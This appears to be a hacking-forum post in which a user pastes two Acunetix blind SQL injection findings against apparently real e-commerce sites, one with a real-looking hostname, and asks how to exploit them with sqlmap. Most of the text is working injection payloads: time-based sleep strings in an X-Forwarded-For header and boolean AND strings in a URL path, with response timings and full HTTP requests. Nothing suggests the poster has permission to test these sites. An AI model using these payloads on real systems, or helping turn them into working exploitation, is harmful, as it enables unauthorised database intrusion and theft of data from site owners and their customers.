#6
22.04.2020, 23:30
rozzet

Quote:
Originally posted by rozzet

How do I exploit vulnerabilities found by Acunetix in sqlmap? Please help me figure it out.
For example, this one?
The vulnerability affects https://site.com/product/11/HP-4250N...inter-LIKE-NEW , X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive
And this one, for example? I would be extremely grateful for any help.

The vulnerability affects https://www.site.com/ , /--[*]-.html

Discovered by Blind SQL Injection

Attack Details

Path Fragment input /--[*]-.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

Tests performed:

volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*3 FALSE

volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*3*9 FALSE

volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 5*6 FALSE

volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE

Original value: volts-amplifier-and-cd-players

HTTP Request

GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUNL-1517.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive
 